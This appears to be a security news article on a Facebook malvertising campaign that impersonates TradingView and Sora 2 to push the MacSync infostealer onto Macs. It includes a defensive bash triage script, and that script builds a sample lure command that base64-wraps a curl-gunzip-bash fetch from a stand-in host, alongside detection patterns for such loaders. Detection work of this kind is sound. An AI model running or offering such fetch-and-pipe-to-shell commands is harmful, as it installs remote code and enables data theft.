
Introduction: The New Face of Cyber Threats
Cybercriminals are getting smarter, targeting users with deceptive ads that look legitimate but deliver malware instead. The latest malvertising campaign focuses on macOS, impersonating well-known trading and AI platforms to trick unsuspecting users into downloading malicious software. As social media advertising becomes a common delivery method, even experienced users can fall victim if they aren’t vigilant.
Fake Ads Targeting macOS Users
The current campaign revives a long-running strategy that previously targeted Windows and Android users. Threat actors are now distributing sponsored Facebook ads promoting fake apps like “Sora 2” and “TradingView Desktop.” These ads aim to lure users into downloading a macOS payload under the guise of trusted software.
Two Waves of Attack
Bitdefender researchers Andreea Olariu and Ionut Baltariu have tracked two related malvertising waves. The first impersonated TradingView Desktop and Premium products, targeting macOS users via sponsored Meta (Facebook) ads. Clicking the ad redirected users to a fraudulent site mimicking TradingView’s interface, complete with a “Download for macOS” button. Instead of delivering an installer, the page instructed visitors to paste a Base64-encoded command into Terminal; once decoded and run, that command launched the malicious script.
The Sora 2 Lure
A few days later, the campaign shifted focus to Sora 2, designed to attract content creators. This wave targeted both macOS and Windows users and directed victims to sorachatgpts[.]com. Despite cosmetic differences, both campaigns used identical templates, delivery methods, and hosting infrastructure, indicating coordination by the same threat actors.
How the Malware Works
The macOS payload operates in multiple stages:
Stage 1 – Loader Script: Downloads a gzip-compressed shell snippet, decompresses it with gunzip, and runs it to fetch the next payload.
Stage 2 – AppleScript Infostealer: Executes MacSync Stealer, an AppleScript-based infostealer that collects sensitive information from the victim’s device.
The stealer also replaces legitimate crypto-wallet apps such as Ledger Live and Trezor Suite with trojanized copies. Version 1.0.8 of MacSync Stealer aggressively harvests credentials, personal data, and crypto-related information, so a single pasted command turns into a full-scale data exfiltration.
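The delivery chain above, as an added triage script for a macOS analyst (this is example code written for this page, not Bitdefender’s tooling or anything from the campaign): it recognises the “paste this into Terminal” pattern of a Base64 blob decoded into a shell, decodes the blob so the stage-1 loader can be read, scores the decoded script for the fetch / gunzip / hand-off behaviour described above, and prints the code-signing authority of the two wallet bundles the stealer is reported to replace. It assumes bash with `base64`, `grep` and `head`; the sample command and the `example.invalid` host are constructed for the example and are not campaign indicators; the `codesign` check only does real work on macOS and reports “skipped” elsewhere.

```shell
#!/usr/bin/env bash
# Added triage helpers for the Base64-to-Terminal lure. Not Bitdefender's or
# the campaign's code; the sample command below and the example.invalid host
# are constructed for this example.

# True (exit 0) when a command line feeds base64-decoded data to an
# interpreter, the shape of the "copy this into Terminal" instruction.
is_b64_to_shell() {
  printf '%s\n' "$1" | grep -Eq \
    'base64[[:space:]]+(-d|-D|--decode)[^|]*\|[[:space:]]*(bash|sh|zsh|osascript)'
}

# Pull the first long base64 blob out of a command line and decode it, so the
# analyst reads the stage-1 loader instead of trusting the lure's wording.
# Note: macOS before 13 spells the decode flag "base64 -D".
decode_b64_blob() {
  local blob
  blob=$(printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/=]{40,}' | head -n 1)
  [ -n "$blob" ] || return 1
  printf '%s' "$blob" | base64 -d 2>/dev/null
}

# Count the loader behaviours listed above in a decoded script:
# remote fetch, gzip decompression, and hand-off to sh/bash/osascript.
score_decoded() {
  local n=0
  printf '%s' "$1" | grep -Eq '(curl|wget)[[:space:]]' && n=$((n+1))
  printf '%s' "$1" | grep -Eq '(gunzip|gzip[[:space:]]+-d|zcat)' && n=$((n+1))
  printf '%s' "$1" | grep -Eq '(\|[[:space:]]*(bash|sh|zsh)|osascript)' && n=$((n+1))
  echo "$n"
}

# Verdict for one command line: "clean" unless it decodes base64 into a
# shell; otherwise SUSPICIOUS with the behaviour score of the decoded blob.
triage_cmd() {
  local decoded score
  is_b64_to_shell "$1" || { echo "clean"; return 0; }
  decoded=$(decode_b64_blob "$1") || decoded=""
  score=$(score_decoded "$decoded")
  echo "SUSPICIOUS score=$score"
}

# Integrity check for a wallet bundle: verify the signature and print the
# Authority / TeamIdentifier lines for comparison with the vendor's published
# values. Needs codesign, so it reports "skipped" off macOS.
check_app_signature() {
  local app="$1"
  command -v codesign >/dev/null 2>&1 || { echo "skipped"; return 0; }
  [ -d "$app" ] || { echo "missing"; return 0; }
  if codesign --verify --strict "$app" >/dev/null 2>&1; then
    codesign -dv "$app" 2>&1 | grep -E '^(Authority|TeamIdentifier)=' | head -n 2
    echo "valid"
  else
    echo "INVALID"
  fi
}

# Constructed sample: a lure-style command wrapping a stage-1 loader that
# fetches a gzip-compressed script and pipes it to bash. example.invalid is a
# reserved name and never resolves.
INNER='curl -fsSL https://example.invalid/stage1.gz | gunzip | bash'
SAMPLE_CMD="echo $(printf '%s' "$INNER" | base64 | tr -d '\n') | base64 -d | bash"

printf 'command: %s\n' "$SAMPLE_CMD"
printf 'decoded: %s\n' "$(decode_b64_blob "$SAMPLE_CMD")"
printf 'verdict: %s\n' "$(triage_cmd "$SAMPLE_CMD")"
for app in "/Applications/Ledger Live.app" "/Applications/Trezor Suite.app"; do
  printf '%s: %s\n' "$app" "$(check_app_signature "$app" | tail -n 1)"
done
```

Run it against lines from `~/.zsh_history` or a support ticket’s pasted “fix”; anything that scores 2 or more is a loader, not a product installer. For the wallet check, a trojanized copy will not carry the vendor’s TeamIdentifier, so compare the printed value with the one on the vendor’s site rather than trusting a “valid” signature on its own.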
The Broader Implications
This campaign highlights how malvertising has evolved into a preferred vector for cross-platform attacks. By embedding malicious installers into paid and “verified” social media ads, cybercriminals bypass traditional security warnings and exploit users’ trust in familiar brands.
What Undercode Say: Deep Analysis of the Campaign
The resurgence of this malvertising campaign underscores the increasing sophistication of cybercriminal operations. The use of familiar, trusted brands like TradingView leverages psychological manipulation, exploiting users’ reliance on recognized software platforms. Attackers are no longer content with basic credential theft; they are building layered, cross-platform malware architectures that include infostealers and crypto-draining functionalities.
This evolution signals a shift in threat actor strategies: instead of mass phishing emails, malvertising lets them reach a wide audience with minimal friction. The combination of social engineering and technical sophistication makes campaigns like this harder to detect. For macOS users, often perceived as more secure than their Windows counterparts, this is a wake-up call that no platform is immune.
The two-wave approach also demonstrates operational flexibility. By switching targets between macOS-only and cross-platform campaigns, attackers can maximize impact while avoiding early detection. The reuse of visual templates and infrastructure indicates a modular, repeatable methodology that allows quick pivoting to new lures, keeping security teams reactive rather than proactive.
Additionally, the integration of crypto-wallet trojans is particularly concerning. By replacing legitimate wallet applications, the malware not only steals credentials but also directly manipulates financial assets, bridging the gap between traditional cybercrime and financial exploitation. This hybrid approach increases both potential damage and the difficulty of mitigation.
The campaign also reflects the evolution of the threat landscape in the context of social media. As platforms like Meta become primary digital interaction points, threat actors exploit paid advertising mechanisms that appear legitimate, bypassing conventional detection methods. Users may perceive these ads as safe, increasing the likelihood of execution and subsequent infection.
Moreover, the Base64-encoded terminal command delivery is a clever exploitation of macOS’s trusted Terminal interface. Because nothing is downloaded through the browser, no quarantine-flagged app bundle ever reaches Gatekeeper; the user runs the loader themselves. Users following instructions to execute these commands unknowingly activate a multi-stage malware pipeline, showing that the success of the campaign relies not just on software tricks but also on user behavior and trust.
The campaign’s persistence indicates ongoing adaptation. Despite Meta’s removal of some ads, the threat actors are likely to rebrand and continue distributing malware, demonstrating that countermeasures must include both technological defenses and user education. Security awareness is crucial, as even experienced users can fall for highly polished scams.
Overall, this operation exemplifies the convergence of social engineering, cross-platform malware, and financial exploitation. It challenges assumptions about platform security, highlighting the importance of vigilance, timely patching, and skepticism toward even seemingly legitimate downloads.
Fact Checker Results
✅ Malvertising confirmed on Meta platforms targeting macOS and Windows users.
❌ No legitimate TradingView or Sora 2 apps are affected; all downloads are malicious.
✅ MacSync Stealer 1.0.8 actively replaces crypto wallets and collects sensitive data.
Prediction: The Future of Cross-Platform Malvertising
Given the modular infrastructure and ongoing evolution of this campaign, similar attacks are likely to continue. Threat actors will continue refining social engineering tactics, targeting both macOS and Windows users, and integrating more sophisticated payloads, including financial malware. Expect new fake apps and AI-related lures to appear, exploiting trending technologies to bypass user suspicion and platform defenses.
References:
Reported By: www.bitdefender.com